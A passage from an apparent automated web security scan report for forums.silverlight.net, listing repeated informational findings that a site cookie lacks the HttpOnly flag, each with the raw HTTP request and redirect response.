The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/lein4d.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2flein4d.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:29 GMT; expires=Sun, 29-Jan-2012 23:16:29 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:29 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2flein4d.aspx
...[SNIP]...

17.248. http://forums.silverlight.net/members/malignate.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/malignate.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/malignate.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fmalignate.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:19 GMT; expires=Sun, 29-Jan-2012 23:41:19 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:20 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fmalignate.a
...[SNIP]...

17.249. http://forums.silverlight.net/members/mbanavige.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/mbanavige.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/mbanavige.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fmbanavige.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:19 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:20 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fmbanavige.a
...[SNIP]...

17.250. http://forums.silverlight.net/members/pitchai.be.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/pitchai.be.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/pitchai.be.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fpitchai.be.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:01 GMT; expires=Sun, 29-Jan-2012 23:17:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:00 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fpitchai.be.
...[SNIP]...

17.251. http://forums.silverlight.net/members/rightcoder.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/rightcoder.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/rightcoder.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2frightcoder.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:19 GMT; expires=Sun, 29-Jan-2012 23:41:19 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:19 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2frightcoder.
...[SNIP]...

17.252. http://forums.silverlight.net/members/samw.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/samw.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/samw.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 232
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsamw.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:34 GMT; expires=Sun, 29-Jan-2012 23:16:34 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:34 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsamw.aspx">
...[SNIP]...

17.253. http://forums.silverlight.net/members/sladapter.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/sladapter.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/sladapter.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsladapter.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:41 GMT; expires=Sun, 29-Jan-2012 23:15:41 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:41 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsladapter.a
...[SNIP]...

17.254. http://forums.silverlight.net/members/snelldl.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/snelldl.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/snelldl.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 235
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsnelldl.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:35 GMT; expires=Sun, 29-Jan-2012 23:16:35 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:35 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsnelldl.asp
...[SNIP]...

17.255. http://forums.silverlight.net/members/sniles.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/sniles.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/sniles.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsniles.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:31 GMT; expires=Sun, 29-Jan-2012 23:16:31 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:31 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsniles.aspx
...[SNIP]...

17.256. http://forums.silverlight.net/members/swo.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/swo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/swo.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 231
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fswo.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:13 GMT; expires=Sun, 29-Jan-2012 23:16:13 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:13 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fswo.aspx">h
...[SNIP]...

17.257. http://forums.silverlight.net/members/syed-amjad.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/syed-amjad.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/syed-amjad.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsyed-amjad.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:00 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsyed-amjad.
...[SNIP]...

17.258. http://forums.silverlight.net/members/tanmoy.r.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/tanmoy.r.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/tanmoy.r.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 236
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2ftanmoy.r.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:05 GMT; expires=Sun, 29-Jan-2012 23:17:05 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:05 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2ftanmoy.r.as
...[SNIP]...

17.259. http://forums.silverlight.net/members/thaicarrot.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/thaicarrot.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/thaicarrot.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fthaicarrot.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fthaicarrot.
...[SNIP]...

17.260. http://forums.silverlight.net/members/vikasamin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/vikasamin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/vikasamin.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fvikasamin.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:00 GMT; expires=Sun, 29-Jan-2012 23:17:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:00 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fvikasamin.a
...[SNIP]...

17.261. http://forums.silverlight.net/members/yifung.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/yifung.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/yifung.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
